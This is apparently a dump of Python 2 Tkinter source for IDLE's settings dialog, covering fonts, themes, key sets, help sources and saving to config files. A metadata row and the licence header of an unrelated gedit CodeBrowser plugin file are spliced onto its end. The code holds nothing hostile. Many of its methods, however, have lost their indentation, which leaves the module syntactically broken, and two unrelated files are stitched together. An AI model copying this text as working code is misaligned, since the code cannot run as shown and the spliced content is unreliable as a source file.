        scrollHelpList.config(command=self.listHelp.yview)
        self.listHelp.config(yscrollcommand=scrollHelpList.set)
        self.listHelp.bind('<ButtonRelease-1>',self.HelpSourceSelected)
        self.buttonHelpListEdit=Button(frameHelpListButtons,text='Edit',
                state=DISABLED,width=8,command=self.HelpListItemEdit)
        self.buttonHelpListAdd=Button(frameHelpListButtons,text='Add',
                width=8,command=self.HelpListItemAdd)
        self.buttonHelpListRemove=Button(frameHelpListButtons,text='Remove',
                state=DISABLED,width=8,command=self.HelpListItemRemove)
        #widget packing
        #body
        frameRun.pack(side=TOP,padx=5,pady=5,fill=X)
        frameSave.pack(side=TOP,padx=5,pady=5,fill=X)
        frameWinSize.pack(side=TOP,padx=5,pady=5,fill=X)
        frameParaSize.pack(side=TOP,padx=5,pady=5,fill=X)
        frameEncoding.pack(side=TOP,padx=5,pady=5,fill=X)
        frameHelp.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
        #frameRun
        labelRunChoiceTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
        radioStartupShell.pack(side=RIGHT,anchor=W,padx=5,pady=5)
        radioStartupEdit.pack(side=RIGHT,anchor=W,padx=5,pady=5)
        #frameSave
        labelRunSaveTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
        radioSaveAuto.pack(side=RIGHT,anchor=W,padx=5,pady=5)
        radioSaveAsk.pack(side=RIGHT,anchor=W,padx=5,pady=5)
        #frameWinSize
        labelWinSizeTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
        entryWinHeight.pack(side=RIGHT,anchor=E,padx=10,pady=5)
        labelWinHeightTitle.pack(side=RIGHT,anchor=E,pady=5)
        entryWinWidth.pack(side=RIGHT,anchor=E,padx=10,pady=5)
        labelWinWidthTitle.pack(side=RIGHT,anchor=E,pady=5)
        #paragraphFormatWidth
        labelParaWidthTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
        entryParaWidth.pack(side=RIGHT,anchor=E,padx=10,pady=5)
        #frameEncoding
        labelEncodingTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
        radioEncNone.pack(side=RIGHT,anchor=E,pady=5)
        radioEncUTF8.pack(side=RIGHT,anchor=E,pady=5)
        radioEncLocale.pack(side=RIGHT,anchor=E,pady=5)
        #frameHelp
        frameHelpListButtons.pack(side=RIGHT,padx=5,pady=5,fill=Y)
        frameHelpList.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
        scrollHelpList.pack(side=RIGHT,anchor=W,fill=Y)
        self.listHelp.pack(side=LEFT,anchor=E,expand=TRUE,fill=BOTH)
        self.buttonHelpListEdit.pack(side=TOP,anchor=W,pady=5)
        self.buttonHelpListAdd.pack(side=TOP,anchor=W)
        self.buttonHelpListRemove.pack(side=TOP,anchor=W,pady=5)
        return frame
def AttachVarCallbacks(self):
self.fontSize.trace_variable('w',self.VarChanged_fontSize)
self.fontName.trace_variable('w',self.VarChanged_fontName)
self.fontBold.trace_variable('w',self.VarChanged_fontBold)
self.spaceNum.trace_variable('w',self.VarChanged_spaceNum)
self.colour.trace_variable('w',self.VarChanged_colour)
self.builtinTheme.trace_variable('w',self.VarChanged_builtinTheme)
self.customTheme.trace_variable('w',self.VarChanged_customTheme)
self.themeIsBuiltin.trace_variable('w',self.VarChanged_themeIsBuiltin)
self.highlightTarget.trace_variable('w',self.VarChanged_highlightTarget)
self.keyBinding.trace_variable('w',self.VarChanged_keyBinding)
self.builtinKeys.trace_variable('w',self.VarChanged_builtinKeys)
self.customKeys.trace_variable('w',self.VarChanged_customKeys)
self.keysAreBuiltin.trace_variable('w',self.VarChanged_keysAreBuiltin)
self.winWidth.trace_variable('w',self.VarChanged_winWidth)
self.winHeight.trace_variable('w',self.VarChanged_winHeight)
self.paraWidth.trace_variable('w',self.VarChanged_paraWidth)
self.startupEdit.trace_variable('w',self.VarChanged_startupEdit)
self.autoSave.trace_variable('w',self.VarChanged_autoSave)
self.encoding.trace_variable('w',self.VarChanged_encoding)
    # --- Tk variable write-trace callbacks -------------------------------
    # Each VarChanged_* method is attached in AttachVarCallbacks and
    # records the new value in self.changedItems via AddChangedItem so it
    # can be written out on Apply/Ok.  *params receives the (name, index,
    # mode) arguments Tk passes to trace callbacks; they are unused.
    def VarChanged_fontSize(self,*params):
        value=self.fontSize.get()
        self.AddChangedItem('main','EditorWindow','font-size',value)
    def VarChanged_fontName(self,*params):
        value=self.fontName.get()
        self.AddChangedItem('main','EditorWindow','font',value)
    def VarChanged_fontBold(self,*params):
        value=self.fontBold.get()
        self.AddChangedItem('main','EditorWindow','font-bold',value)
    def VarChanged_spaceNum(self,*params):
        value=self.spaceNum.get()
        self.AddChangedItem('main','Indent','num-spaces',value)
    def VarChanged_colour(self,*params):
        # Delegates: the colour change also has to repaint the sample.
        self.OnNewColourSet()
    def VarChanged_builtinTheme(self,*params):
        value=self.builtinTheme.get()
        self.AddChangedItem('main','Theme','name',value)
        self.PaintThemeSample()
    def VarChanged_customTheme(self,*params):
        value=self.customTheme.get()
        # The placeholder shown when no custom theme exists is not a
        # real theme name and must not be recorded.
        if value != '- no custom themes -':
            self.AddChangedItem('main','Theme','name',value)
            self.PaintThemeSample()
    def VarChanged_themeIsBuiltin(self,*params):
        # Record the built-in/custom flag, then re-record whichever theme
        # name is now the active one.
        value=self.themeIsBuiltin.get()
        self.AddChangedItem('main','Theme','default',value)
        if value:
            self.VarChanged_builtinTheme()
        else:
            self.VarChanged_customTheme()
    def VarChanged_highlightTarget(self,*params):
        self.SetHighlightTarget()
    def VarChanged_keyBinding(self,*params):
        # A binding changed: route it either to the custom key set
        # section or to the owning extension's _cfgBindings section.
        value=self.keyBinding.get()
        keySet=self.customKeys.get()
        event=self.listBindings.get(ANCHOR).split()[0]
        if idleConf.IsCoreBinding(event):
            #this is a core keybinding
            self.AddChangedItem('keys',keySet,event,value)
        else: #this is an extension key binding
            extName=idleConf.GetExtnNameForEvent(event)
            extKeybindSection=extName+'_cfgBindings'
            self.AddChangedItem('extensions',extKeybindSection,event,value)
    def VarChanged_builtinKeys(self,*params):
        value=self.builtinKeys.get()
        self.AddChangedItem('main','Keys','name',value)
        self.LoadKeysList(value)
    def VarChanged_customKeys(self,*params):
        value=self.customKeys.get()
        # Skip the placeholder shown when no custom key set exists.
        if value != '- no custom keys -':
            self.AddChangedItem('main','Keys','name',value)
            self.LoadKeysList(value)
    def VarChanged_keysAreBuiltin(self,*params):
        # Record the built-in/custom flag, then re-record whichever key
        # set name is now the active one.
        value=self.keysAreBuiltin.get()
        self.AddChangedItem('main','Keys','default',value)
        if value:
            self.VarChanged_builtinKeys()
        else:
            self.VarChanged_customKeys()
    def VarChanged_winWidth(self,*params):
        value=self.winWidth.get()
        self.AddChangedItem('main','EditorWindow','width',value)
    def VarChanged_winHeight(self,*params):
        value=self.winHeight.get()
        self.AddChangedItem('main','EditorWindow','height',value)
    def VarChanged_paraWidth(self,*params):
        value=self.paraWidth.get()
        self.AddChangedItem('main','FormatParagraph','paragraph',value)
    def VarChanged_startupEdit(self,*params):
        value=self.startupEdit.get()
        self.AddChangedItem('main','General','editor-on-startup',value)
    def VarChanged_autoSave(self,*params):
        value=self.autoSave.get()
        self.AddChangedItem('main','General','autosave',value)
    def VarChanged_encoding(self,*params):
        value=self.encoding.get()
        self.AddChangedItem('main','EditorWindow','encoding',value)
def ResetChangedItems(self):
#When any config item is changed in this dialog, an entry
#should be made in the relevant section (config type) of this
#dictionary. The key should be the config file section name and the
#value a dictionary, whose key:value pairs are item=value pairs for
#that config file section.
self.changedItems={'main':{},'highlight':{},'keys':{},'extensions':{}}
def AddChangedItem(self,type,section,item,value):
value=str(value) #make sure we use a string
if section not in self.changedItems[type]:
self.changedItems[type][section]={}
self.changedItems[type][section][item]=value
def GetDefaultItems(self):
dItems={'main':{},'highlight':{},'keys':{},'extensions':{}}
for configType in dItems.keys():
sections=idleConf.GetSectionList('default',configType)
for section in sections:
dItems[configType][section]={}
options=idleConf.defaultCfg[configType].GetOptionList(section)
for option in options:
dItems[configType][section][option]=(
idleConf.defaultCfg[configType].Get(section,option))
return dItems
def SetThemeType(self):
if self.themeIsBuiltin.get():
self.optMenuThemeBuiltin.config(state=NORMAL)
self.optMenuThemeCustom.config(state=DISABLED)
self.buttonDeleteCustomTheme.config(state=DISABLED)
else:
self.optMenuThemeBuiltin.config(state=DISABLED)
self.radioThemeCustom.config(state=NORMAL)
self.optMenuThemeCustom.config(state=NORMAL)
self.buttonDeleteCustomTheme.config(state=NORMAL)
def SetKeysType(self):
if self.keysAreBuiltin.get():
self.optMenuKeysBuiltin.config(state=NORMAL)
self.optMenuKeysCustom.config(state=DISABLED)
self.buttonDeleteCustomKeys.config(state=DISABLED)
else:
self.optMenuKeysBuiltin.config(state=DISABLED)
self.radioKeysCustom.config(state=NORMAL)
self.optMenuKeysCustom.config(state=NORMAL)
self.buttonDeleteCustomKeys.config(state=NORMAL)
    def GetNewKeys(self):
        """Let the user re-map the binding currently selected in the list.

        Opens the key-capture dialog seeded with all current key
        sequences (including unsaved edits) so conflicts can be detected.
        If the active key set is a built-in one, the edit is redirected
        into a newly created custom key set first (built-ins are
        read-only).  On success the listbox row and keyBinding variable
        are updated; the listbox selection is restored in every path.
        """
        listIndex=self.listBindings.index(ANCHOR)
        binding=self.listBindings.get(listIndex)
        bindName=binding.split()[0] #first part, up to first space
        if self.keysAreBuiltin.get():
            currentKeySetName=self.builtinKeys.get()
        else:
            currentKeySetName=self.customKeys.get()
        currentBindings=idleConf.GetCurrentKeySet()
        if currentKeySetName in self.changedItems['keys'].keys(): #unsaved changes
            keySetChanges=self.changedItems['keys'][currentKeySetName]
            for event in keySetChanges.keys():
                currentBindings[event]=keySetChanges[event].split()
        currentKeySequences=currentBindings.values()
        newKeys=GetKeysDialog(self,'Get New Keys',bindName,
                currentKeySequences).result
        if newKeys: #new keys were specified
            if self.keysAreBuiltin.get(): #current key set is a built-in
                message=('Your changes will be saved as a new Custom Key Set. '+
                         'Enter a name for your new Custom Key Set below.')
                newKeySet=self.GetNewKeysName(message)
                if not newKeySet: #user cancelled custom key set creation
                    self.listBindings.select_set(listIndex)
                    self.listBindings.select_anchor(listIndex)
                    return
                else: #create new custom key set based on previously active key set
                    self.CreateNewKeySet(newKeySet)
            self.listBindings.delete(listIndex)
            self.listBindings.insert(listIndex,bindName+' - '+newKeys)
            self.listBindings.select_set(listIndex)
            self.listBindings.select_anchor(listIndex)
            self.keyBinding.set(newKeys)
        else:
            self.listBindings.select_set(listIndex)
            self.listBindings.select_anchor(listIndex)
def GetNewKeysName(self,message):
usedNames=(idleConf.GetSectionList('user','keys')+
idleConf.GetSectionList('default','keys'))
newKeySet=GetCfgSectionNameDialog(self,'New Custom Key Set',
message,usedNames).result
return newKeySet
def SaveAsNewKeySet(self):
newKeysName=self.GetNewKeysName('New Key Set Name:')
if newKeysName:
self.CreateNewKeySet(newKeysName)
    def KeyBindingSelected(self,event):
        # A binding row was clicked: enable the re-mapping button.
        self.buttonNewKeys.config(state=NORMAL)
def CreateNewKeySet(self,newKeySetName):
#creates new custom key set based on the previously active key set,
#and makes the new key set active
if self.keysAreBuiltin.get():
prevKeySetName=self.builtinKeys.get()
else:
prevKeySetName=self.customKeys.get()
prevKeys=idleConf.GetCoreKeys(prevKeySetName)
newKeys={}
for event in prevKeys.keys(): #add key set to changed items
eventName=event[2:-2] #trim off the angle brackets
binding=string.join(prevKeys[event])
newKeys[eventName]=binding
#handle any unsaved changes to prev key set
if prevKeySetName in self.changedItems['keys'].keys():
keySetChanges=self.changedItems['keys'][prevKeySetName]
for event in keySetChanges.keys():
newKeys[event]=keySetChanges[event]
#save the new theme
self.SaveNewKeySet(newKeySetName,newKeys)
#change gui over to the new key set
customKeyList=idleConf.GetSectionList('user','keys')
customKeyList.sort()
self.optMenuKeysCustom.SetMenu(customKeyList,newKeySetName)
self.keysAreBuiltin.set(0)
self.SetKeysType()
def LoadKeysList(self,keySetName):
reselect=0
newKeySet=0
if self.listBindings.curselection():
reselect=1
listIndex=self.listBindings.index(ANCHOR)
keySet=idleConf.GetKeySet(keySetName)
bindNames=keySet.keys()
bindNames.sort()
self.listBindings.delete(0,END)
for bindName in bindNames:
key=string.join(keySet[bindName]) #make key(s) into a string
bindName=bindName[2:-2] #trim off the angle brackets
if keySetName in self.changedItems['keys'].keys():
#handle any unsaved changes to this key set
if bindName in self.changedItems['keys'][keySetName].keys():
key=self.changedItems['keys'][keySetName][bindName]
self.listBindings.insert(END, bindName+' - '+key)
if reselect:
self.listBindings.see(listIndex)
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
def DeleteCustomKeys(self):
keySetName=self.customKeys.get()
if not tkMessageBox.askyesno('Delete Key Set','Are you sure you wish '+
'to delete the key set %r ?' % (keySetName),
parent=self):
return
#remove key set from config
idleConf.userCfg['keys'].remove_section(keySetName)
if keySetName in self.changedItems['keys']:
del(self.changedItems['keys'][keySetName])
#write changes
idleConf.userCfg['keys'].Save()
#reload user key set list
itemList=idleConf.GetSectionList('user','keys')
itemList.sort()
if not itemList:
self.radioKeysCustom.config(state=DISABLED)
self.optMenuKeysCustom.SetMenu(itemList,'- no custom keys -')
else:
self.optMenuKeysCustom.SetMenu(itemList,itemList[0])
#revert to default key set
self.keysAreBuiltin.set(idleConf.defaultCfg['main'].Get('Keys','default'))
self.builtinKeys.set(idleConf.defaultCfg['main'].Get('Keys','name'))
#user can't back out of these changes, they must be applied now
self.Apply()
self.SetKeysType()
def DeleteCustomTheme(self):
themeName=self.customTheme.get()
if not tkMessageBox.askyesno('Delete Theme','Are you sure you wish '+
'to delete the theme %r ?' % (themeName,),
parent=self):
return
#remove theme from config
idleConf.userCfg['highlight'].remove_section(themeName)
if themeName in self.changedItems['highlight']:
del(self.changedItems['highlight'][themeName])
#write changes
idleConf.userCfg['highlight'].Save()
#reload user theme list
itemList=idleConf.GetSectionList('user','highlight')
itemList.sort()
if not itemList:
self.radioThemeCustom.config(state=DISABLED)
self.optMenuThemeCustom.SetMenu(itemList,'- no custom themes -')
else:
self.optMenuThemeCustom.SetMenu(itemList,itemList[0])
#revert to default theme
self.themeIsBuiltin.set(idleConf.defaultCfg['main'].Get('Theme','default'))
self.builtinTheme.set(idleConf.defaultCfg['main'].Get('Theme','name'))
#user can't back out of these changes, they must be applied now
self.Apply()
self.SetThemeType()
    def GetColour(self):
        """Open a colour chooser for the current highlight target.

        If the user picks a different colour while a built-in theme is
        active, a custom theme is created first (built-ins are
        read-only).  The chosen colour is then pushed through
        self.colour, whose write-trace fires OnNewColourSet.
        """
        target=self.highlightTarget.get()
        prevColour=self.frameColourSet.cget('bg')
        rgbTuplet, colourString = tkColorChooser.askcolor(parent=self,
            title='Pick new colour for : '+target,initialcolor=prevColour)
        if colourString and (colourString!=prevColour):
            #user didn't cancel, and they chose a new colour
            if self.themeIsBuiltin.get(): #current theme is a built-in
                message=('Your changes will be saved as a new Custom Theme. '+
                         'Enter a name for your new Custom Theme below.')
                newTheme=self.GetNewThemeName(message)
                if not newTheme: #user cancelled custom theme creation
                    return
                else: #create new custom theme based on previously active theme
                    self.CreateNewTheme(newTheme)
                    self.colour.set(colourString)
            else: #current theme is user defined
                self.colour.set(colourString)
def OnNewColourSet(self):
newColour=self.colour.get()
self.frameColourSet.config(bg=newColour)#set sample
if self.fgHilite.get(): plane='foreground'
else: plane='background'
sampleElement=self.themeElements[self.highlightTarget.get()][0]
self.textHighlightSample.tag_config(sampleElement, **{plane:newColour})
theme=self.customTheme.get()
themeElement=sampleElement+'-'+plane
self.AddChangedItem('highlight',theme,themeElement,newColour)
def GetNewThemeName(self,message):
usedNames=(idleConf.GetSectionList('user','highlight')+
idleConf.GetSectionList('default','highlight'))
newTheme=GetCfgSectionNameDialog(self,'New Custom Theme',
message,usedNames).result
return newTheme
def SaveAsNewTheme(self):
newThemeName=self.GetNewThemeName('New Theme Name:')
if newThemeName:
self.CreateNewTheme(newThemeName)
    def CreateNewTheme(self,newThemeName):
        """Create and activate a custom theme copied from the active theme.

        Any unsaved highlight changes of the old theme are folded into the
        copy before it is saved and selected in the GUI.
        """
        #creates new custom theme based on the previously active theme,
        #and makes the new theme active
        if self.themeIsBuiltin.get():
            themeType='default'
            themeName=self.builtinTheme.get()
        else:
            themeType='user'
            themeName=self.customTheme.get()
        newTheme=idleConf.GetThemeDict(themeType,themeName)
        #apply any of the old theme's unsaved changes to the new theme
        if themeName in self.changedItems['highlight'].keys():
            themeChanges=self.changedItems['highlight'][themeName]
            for element in themeChanges.keys():
                newTheme[element]=themeChanges[element]
        #save the new theme
        self.SaveNewTheme(newThemeName,newTheme)
        #change gui over to the new theme
        customThemeList=idleConf.GetSectionList('user','highlight')
        customThemeList.sort()
        self.optMenuThemeCustom.SetMenu(customThemeList,newThemeName)
        self.themeIsBuiltin.set(0)
        self.SetThemeType()
    def OnListFontButtonRelease(self,event):
        """Adopt the font clicked in the font listbox and refresh the sample."""
        font = self.listFontName.get(ANCHOR)
        self.fontName.set(font.lower())
        self.SetFontSample()
def SetFontSample(self,event=None):
fontName=self.fontName.get()
if self.fontBold.get():
fontWeight=tkFont.BOLD
else:
fontWeight=tkFont.NORMAL
newFont = (fontName, self.fontSize.get(), fontWeight)
self.labelFontSample.config(font=newFont)
self.textHighlightSample.configure(font=newFont)
    def SetHighlightTarget(self):
        """Enable/disable the fg/bg radio buttons for the selected target.

        The cursor element has no background colour, so only foreground is
        selectable for it.
        """
        if self.highlightTarget.get()=='Cursor': #bg not possible
            self.radioFg.config(state=DISABLED)
            self.radioBg.config(state=DISABLED)
            self.fgHilite.set(1)
        else: #both fg and bg can be set
            self.radioFg.config(state=NORMAL)
            self.radioBg.config(state=NORMAL)
            self.fgHilite.set(1)
        self.SetColourSample()
    def SetColourSampleBinding(self,*args):
        """Tk variable-trace callback: refresh the colour sample."""
        self.SetColourSample()
    def SetColourSample(self):
        #set the colour sample area to the colour of the selected element/plane
        tag=self.themeElements[self.highlightTarget.get()][0]
        if self.fgHilite.get(): plane='foreground'
        else: plane='background'
        colour=self.textHighlightSample.tag_cget(tag,plane)
        self.frameColourSet.config(bg=colour)
    def PaintThemeSample(self):
        """Apply the selected theme's colours (plus any unsaved edits) to the
        highlight sample text widget."""
        if self.themeIsBuiltin.get(): #a default theme
            theme=self.builtinTheme.get()
        else: #a user theme
            theme=self.customTheme.get()
        for elementTitle in self.themeElements.keys():
            element=self.themeElements[elementTitle][0]
            colours=idleConf.GetHighlight(theme,element)
            if element=='cursor': #cursor sample needs special painting
                colours['background']=idleConf.GetHighlight(theme,
                        'normal', fgBg='bg')
            #handle any unsaved changes to this theme
            if theme in self.changedItems['highlight'].keys():
                themeDict=self.changedItems['highlight'][theme]
                if element+'-foreground' in themeDict:
                    colours['foreground']=themeDict[element+'-foreground']
                if element+'-background' in themeDict:
                    colours['background']=themeDict[element+'-background']
            self.textHighlightSample.tag_config(element, **colours)
        self.SetColourSample()
    def HelpSourceSelected(self,event):
        """Listbox selection callback: update help-list button states."""
        self.SetHelpListButtonStates()
def SetHelpListButtonStates(self):
if self.listHelp.size()<1: #no entries in list
self.buttonHelpListEdit.config(state=DISABLED)
self.buttonHelpListRemove.config(state=DISABLED)
else: #there are some entries
if self.listHelp.curselection(): #there currently is a selection
self.buttonHelpListEdit.config(state=NORMAL)
self.buttonHelpListRemove.config(state=NORMAL)
else: #there currently is not a selection
self.buttonHelpListEdit.config(state=DISABLED)
self.buttonHelpListRemove.config(state=DISABLED)
    def HelpListItemAdd(self):
        """Prompt for a new help source and append it to the list widgets."""
        helpSource=GetHelpSourceDialog(self,'New Help Source').result
        if helpSource:
            self.userHelpList.append( (helpSource[0],helpSource[1]) )
            self.listHelp.insert(END,helpSource[0])
            self.UpdateUserHelpChangedItems()
        self.SetHelpListButtonStates()
    def HelpListItemEdit(self):
        """Edit the anchored help source in place; no-op if unchanged."""
        itemIndex=self.listHelp.index(ANCHOR)
        helpSource=self.userHelpList[itemIndex]
        newHelpSource=GetHelpSourceDialog(self,'Edit Help Source',
                menuItem=helpSource[0],filePath=helpSource[1]).result
        if (not newHelpSource) or (newHelpSource==helpSource):
            return #no changes
        self.userHelpList[itemIndex]=newHelpSource
        self.listHelp.delete(itemIndex)
        self.listHelp.insert(itemIndex,newHelpSource[0])
        self.UpdateUserHelpChangedItems()
        self.SetHelpListButtonStates()
def HelpListItemRemove(self):
itemIndex=self.listHelp.index(ANCHOR)
del(self.userHelpList[itemIndex])
self.listHelp.delete(itemIndex)
self.UpdateUserHelpChangedItems()
self.SetHelpListButtonStates()
    def UpdateUserHelpChangedItems(self):
        "Clear and rebuild the HelpFiles section in self.changedItems"
        self.changedItems['main']['HelpFiles'] = {}
        # entries are stored 1-based as 'menu-text;file-path' strings
        # (string.join is the Python 2 spelling of ';'.join)
        for num in range(1,len(self.userHelpList)+1):
            self.AddChangedItem('main','HelpFiles',str(num),
                    string.join(self.userHelpList[num-1][:2],';'))
    def LoadFontCfg(self):
        """Populate the font page widgets from the current configuration."""
        ##base editor font selection list
        fonts=list(tkFont.families(self))
        fonts.sort()
        for font in fonts:
            self.listFontName.insert(END,font)
        configuredFont=idleConf.GetOption('main','EditorWindow','font',
                default='courier')
        lc_configuredFont = configuredFont.lower()
        self.fontName.set(lc_configuredFont)
        # match the configured font case-insensitively against the family list
        lc_fonts = [s.lower() for s in fonts]
        if lc_configuredFont in lc_fonts:
            currentFontIndex = lc_fonts.index(lc_configuredFont)
            self.listFontName.see(currentFontIndex)
            self.listFontName.select_set(currentFontIndex)
            self.listFontName.select_anchor(currentFontIndex)
        ##font size dropdown
        fontSize=idleConf.GetOption('main','EditorWindow','font-size',
                type='int', default='10')
        self.optMenuFontSize.SetMenu(('7','8','9','10','11','12','13','14',
                '16','18','20','22'),fontSize )
        ##fontWeight
        self.fontBold.set(idleConf.GetOption('main','EditorWindow',
                'font-bold',default=0,type='bool'))
        ##font sample
        self.SetFontSample()
    def LoadTabCfg(self):
        """Populate the indentation widgets from the current configuration."""
        ##indent sizes
        spaceNum=idleConf.GetOption('main','Indent','num-spaces',
                default=4,type='int')
        self.spaceNum.set(spaceNum)
    def LoadThemeCfg(self):
        """Populate the highlighting page widgets from the configuration."""
        ##current theme type radiobutton
        self.themeIsBuiltin.set(idleConf.GetOption('main','Theme','default',
                type='bool',default=1))
        ##currently set theme
        currentOption=idleConf.CurrentTheme()
        ##load available theme option menus
        if self.themeIsBuiltin.get(): #default theme selected
            itemList=idleConf.GetSectionList('default','highlight')
            itemList.sort()
            self.optMenuThemeBuiltin.SetMenu(itemList,currentOption)
            itemList=idleConf.GetSectionList('user','highlight')
            itemList.sort()
            if not itemList:
                self.radioThemeCustom.config(state=DISABLED)
                self.customTheme.set('- no custom themes -')
            else:
                self.optMenuThemeCustom.SetMenu(itemList,itemList[0])
        else: #user theme selected
            itemList=idleConf.GetSectionList('user','highlight')
            itemList.sort()
            self.optMenuThemeCustom.SetMenu(itemList,currentOption)
            itemList=idleConf.GetSectionList('default','highlight')
            itemList.sort()
            self.optMenuThemeBuiltin.SetMenu(itemList,itemList[0])
        self.SetThemeType()
        ##load theme element option menu
        themeNames=self.themeElements.keys()
        themeNames.sort(key=lambda x: self.themeElements[x][1])
        self.optMenuHighlightTarget.SetMenu(themeNames,themeNames[0])
        self.PaintThemeSample()
        self.SetHighlightTarget()
    def LoadKeyCfg(self):
        """Populate the keys page widgets from the current configuration."""
        ##current keys type radiobutton
        self.keysAreBuiltin.set(idleConf.GetOption('main','Keys','default',
                type='bool',default=1))
        ##currently set keys
        currentOption=idleConf.CurrentKeys()
        ##load available keyset option menus
        if self.keysAreBuiltin.get(): #default theme selected
            itemList=idleConf.GetSectionList('default','keys')
            itemList.sort()
            self.optMenuKeysBuiltin.SetMenu(itemList,currentOption)
            itemList=idleConf.GetSectionList('user','keys')
            itemList.sort()
            if not itemList:
                self.radioKeysCustom.config(state=DISABLED)
                self.customKeys.set('- no custom keys -')
            else:
                self.optMenuKeysCustom.SetMenu(itemList,itemList[0])
        else: #user key set selected
            itemList=idleConf.GetSectionList('user','keys')
            itemList.sort()
            self.optMenuKeysCustom.SetMenu(itemList,currentOption)
            itemList=idleConf.GetSectionList('default','keys')
            itemList.sort()
            self.optMenuKeysBuiltin.SetMenu(itemList,itemList[0])
        self.SetKeysType()
        ##load keyset element list
        keySetName=idleConf.CurrentKeys()
        self.LoadKeysList(keySetName)
    def LoadGeneralCfg(self):
        """Populate the general page widgets from the current configuration."""
        #startup state
        self.startupEdit.set(idleConf.GetOption('main','General',
                'editor-on-startup',default=1,type='bool'))
        #autosave state
        self.autoSave.set(idleConf.GetOption('main', 'General', 'autosave',
                default=0, type='bool'))
        #initial window size
        self.winWidth.set(idleConf.GetOption('main','EditorWindow','width',
                type='int'))
        self.winHeight.set(idleConf.GetOption('main','EditorWindow','height',
                type='int'))
        #initial paragraph reformat size
        self.paraWidth.set(idleConf.GetOption('main','FormatParagraph','paragraph',
                type='int'))
        # default source encoding
        self.encoding.set(idleConf.GetOption('main', 'EditorWindow',
                'encoding', default='none'))
        # additional help sources
        self.userHelpList = idleConf.GetAllExtraHelpSourcesList()
        for helpItem in self.userHelpList:
            self.listHelp.insert(END,helpItem[0])
        self.SetHelpListButtonStates()
    def LoadConfigs(self):
        """
        Load configuration from the default and user config files and
        populate the widgets on the config dialog pages.
        """
        ### fonts / tabs page
        self.LoadFontCfg()
        self.LoadTabCfg()
        ### highlighting page
        self.LoadThemeCfg()
        ### keys page
        self.LoadKeyCfg()
        ### general page
        self.LoadGeneralCfg()
def SaveNewKeySet(self,keySetName,keySet):
"""
save a newly created core key set.
keySetName - string, the name of the new key set
keySet - dictionary containing the new key set
"""
if not idleConf.userCfg['keys'].has_section(keySetName):
idleConf.userCfg['keys'].add_section(keySetName)
for event in keySet.keys():
value=keySet[event]
idleConf.userCfg['keys'].SetOption(keySetName,event,value)
def SaveNewTheme(self,themeName,theme):
"""
save a newly created theme.
themeName - string, the name of the new theme
theme - dictionary containing the new theme
"""
if not idleConf.userCfg['highlight'].has_section(themeName):
idleConf.userCfg['highlight'].add_section(themeName)
for element in theme.keys():
value=theme[element]
idleConf.userCfg['highlight'].SetOption(themeName,element,value)
    def SetUserValue(self,configType,section,item,value):
        """Store one option in the user config; drop it when it equals the
        default.  Returns a truthy value when the user config was modified."""
        if idleConf.defaultCfg[configType].has_option(section,item):
            if idleConf.defaultCfg[configType].Get(section,item)==value:
                #the setting equals a default setting, remove it from user cfg
                return idleConf.userCfg[configType].RemoveOption(section,item)
        #if we got here set the option
        return idleConf.userCfg[configType].SetOption(section,item,value)
    def SaveAllChangedConfigs(self):
        "Save configuration changes to the user config file."
        idleConf.userCfg['main'].Save()
        for configType in self.changedItems.keys():
            cfgTypeHasChanges = False
            for section in self.changedItems[configType].keys():
                if section == 'HelpFiles':
                    #this section gets completely replaced
                    idleConf.userCfg['main'].remove_section('HelpFiles')
                    cfgTypeHasChanges = True
                for item in self.changedItems[configType][section].keys():
                    value = self.changedItems[configType][section][item]
                    if self.SetUserValue(configType,section,item,value):
                        cfgTypeHasChanges = True
            if cfgTypeHasChanges:
                idleConf.userCfg[configType].Save()
        for configType in ['keys', 'highlight']:
            # save these even if unchanged!
            idleConf.userCfg[configType].Save()
        self.ResetChangedItems() #clear the changed items dict
    def DeactivateCurrentConfig(self):
        """Remove key bindings from all editor windows before saving."""
        #Before a config is saved, some cleanup of current
        #config must be done - remove the previous keybindings
        winInstances=self.parent.instance_dict.keys()
        for instance in winInstances:
            instance.RemoveKeybindings()
    def ActivateConfigChanges(self):
        "Dynamically apply configuration changes"
        # push the new settings into every open editor window
        winInstances=self.parent.instance_dict.keys()
        for instance in winInstances:
            instance.ResetColorizer()
            instance.ResetFont()
            instance.set_notabs_indentwidth()
            instance.ApplyKeybindings()
            instance.reset_help_menu_entries()
    def Cancel(self):
        """Discard pending changes and close the dialog."""
        self.destroy()
    def Ok(self):
        """Apply all pending changes, then close the dialog."""
        self.Apply()
        self.destroy()
    def Apply(self):
        """Save pending changes and propagate them to all open windows."""
        self.DeactivateCurrentConfig()
        self.SaveAllChangedConfigs()
        self.ActivateConfigChanges()
    def Help(self):
        # TODO: dialog help is not implemented yet
        pass
if __name__ == '__main__':
    # Manual smoke test: a root window with one button that opens the
    # ConfigDialog.
    root = Tk()
    root.instance_dict = {}
    button = Button(root, text='Dialog',
                    command=lambda: ConfigDialog(root, 'Settings'))
    button.pack()
    root.mainloop()
| 46.168103 | 99 | 0.644459 |
ace74a0472f645627d8d2ceaf5e7383234b0a44c | 9,171 | py | Python | codebrowser/parsers.py | nagaozen/gedit-plugin-codebrowser | a0a93732e0e38b86cddbdb86f10e8f6d46d892f5 | [
"Unlicense"
] | 2 | 2015-04-17T01:15:00.000Z | 2018-06-09T11:03:12.000Z | codebrowser/parsers.py | nagaozen/gedit-plugin-codebrowser | a0a93732e0e38b86cddbdb86f10e8f6d46d892f5 | [
"Unlicense"
] | null | null | null | codebrowser/parsers.py | nagaozen/gedit-plugin-codebrowser | a0a93732e0e38b86cddbdb86f10e8f6d46d892f5 | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
# gEdit CodeBrowser plugin
# Copyright (C) 2011 Fabio Zendhi Nagao
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
import iconlib
import os
